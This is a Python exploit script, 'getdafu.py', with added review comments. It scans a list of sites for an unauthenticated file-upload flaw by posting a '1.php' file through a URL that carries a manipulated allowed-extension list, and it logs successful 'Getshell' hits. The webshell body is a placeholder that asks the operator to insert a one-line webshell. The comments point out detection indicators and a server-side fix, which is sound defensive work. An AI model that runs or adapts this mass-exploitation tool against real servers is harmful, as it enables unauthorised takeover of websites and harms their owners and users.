import requests
import json
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Silences urllib3's InsecureRequestWarning. The request in checkweak() is sent
# with verify=False, so server certificates are never validated and nothing is
# printed about it.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Body of the file part that checkweak() uploads. The listing ships only this
# placeholder text (a note telling the operator to paste a one-line webshell
# here); no payload is included.
shell = '''这里写入一句话木马'''
class DafuGetShell(object):
    """Send a ``.php`` file upload to a fixed path and report accepted uploads.

    NOTE(review): the listing had lost its line breaks and indentation; the
    nesting below is reconstructed from statement order and should be
    confirmed against the original file.

    What a defender can take from this class, all visible in checkweak():
    the request is a multipart POST to a path containing
    ``Uploads.upload.allowext.`` followed by a ``|``-separated (``%7C``)
    extension list that includes ``php``, with ``dir=uploads`` in the query,
    a form part named ``imgFile`` and the filename ``1.php``. The boundary
    string and User-Agent are hard-coded, so they are stable log/WAF
    indicators for this exact script.

    NOTE(review): the path looks like it carries the allowed-extension list
    from the client - presumably the server honours it; confirm against the
    application. If so, the fix is server-side: keep the extension allow-list
    in server configuration, and do not let the upload directory execute
    scripts.
    """

    # NOTE(review): the name has one leading underscore, so Python does not
    # treat this as the constructor; it is an ordinary method that does nothing.
    def _init__(self,):
        pass

    def Parse_url(self,arg):
        """Reduce *arg* to the string ``scheme://hostname:port``.

        ``http://`` is prepended when *arg* does not start with "http". When
        the parsed URL has no explicit port, 443 is used for https and 80 for
        http; in every other case ``result.port`` is used as parsed. Only
        scheme, hostname and port are concatenated, so path and query are
        dropped.
        """
        print(arg)  # echoes every input value to stdout
        # Original author's note (a bare string statement, not a docstring):
        # "URL handling function".
        ''' Url处理函数 '''
        import sys
        # Python 2 and Python 3 keep urlparse in different modules.
        if sys.version_info < (3, 0):
            import urlparse
            if arg.startswith("http"):
                result = urlparse.urlparse(arg)
            else:
                result = urlparse.urlparse('http://%s' % arg)
        else:
            from urllib.parse import urlparse
            if arg.startswith("http"):
                result = urlparse(arg)
            else:
                result = urlparse('http://%s' % arg)
        if result.port is None and result.scheme == 'https':
            port = 443
        elif result.port is None and result.scheme == 'http':
            port = 80
        else:
            port = result.port
        # `scheme` is assigned here but never read; the return value uses
        # result.scheme instead.
        if port == 443:
            scheme = 'https'
        else:
            scheme = 'http'
        return result.scheme+"://"+result.hostname+":"+str(port)

    def checkweak(self,url):
        """POST a hand-built multipart body to the upload path under *url*.

        When the response body contains ``"error":0`` and (lower-cased)
        ``uploads``, a "[+] Getshell" report is built from *url* and the raw
        ``r.content``. Otherwise the method ends without a return statement,
        i.e. yields None.
        """
        # The same boundary value is repeated literally in the Content-Type
        # header below; the two must stay in sync.
        boundary = '---------------------------18467633426500'
        data = []
        data.append('--%s' % boundary)
        # Form field "imgFile" with a .php filename: this is the part an
        # upload filter or WAF rule would have to reject.
        data.append('Content-Disposition: form-data; name="imgFile"; filename="1.php"')
        # The trailing CRLF, plus the CRLF added by join(), produces the empty
        # line that separates the part headers from the part body.
        data.append('Content-Type: %s\r\n' % ' text/plain')
        data.append(shell)
        data.append('--%s--\r\n' % boundary)
        http_body = '\r\n'.join(data)
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Content-Type':'multipart/form-data; boundary=---------------------------18467633426500',
        }
        # verify=False disables TLS certificate validation; timeout=5 bounds
        # the wait per request. No authentication header or cookie is sent.
        r = requests.post(url+"Uploads.upload.allowext.gif%7Cjpg%7Cjpeg%7Cphp%7Cpng%7Cbmp.size.2.do?dir=uploads", data=http_body,headers=headers,verify=False,timeout=5)
        ret = r.content
        # Success is inferred purely from two substrings in the response body.
        if '"error":0' in str(ret) and 'uploads' in str(ret.lower()):
            return "[+] Getshell "+url+"\r"+ret

    def audit(self,arg):
        """Run checkweak() on *arg* joined with each candidate admin path.

        A truthy result is printed and appended to ``0ok.txt`` in the current
        working directory. Any exception raised for a path is printed and the
        loop moves on to the next path.
        """
        adminpath = ['/admin/Admincenter/','/aaa/Admincenter/','/wwwroot/Admincenter/','/admin/','/Admincenter/',"/"]
        for i in adminpath:
            url = arg+i

            try:
                weak = self.checkweak(url)
                if weak:
                    # Message text means "vulnerable address found".
                    print("找到漏洞地址:%s"%(weak))
                    # Opened in append mode and closed by hand; the handle is
                    # not closed if write() raises.
                    file = open('0ok.txt','a')
                    file.write("找到漏洞地址:%s\r\n"%(weak))
                    file.close()
            except Exception as error:
                print(error)
if __name__ == "__main__":
    # Usage check: reading sys.argv[1] raises IndexError when no argument was
    # given. The bare except catches that (and anything else) and prints the
    # usage line, whose bracketed text means "filename.txt", then exits.
    try:
        if not sys.argv[1]:
            pass
    except:
        print("Use: python getdafu.py [文件名.txt]")
        exit()
    # The argument is a text file read one entry per line. The handle is never
    # closed explicitly.
    openfile=open(sys.argv[1])
    for lines in openfile.readlines():
        line = lines.strip()
        # Two separate instances are created per line; audit() has no return
        # statement, so `_` is always None.
        _ = DafuGetShell().audit(DafuGetShell().Parse_url(line))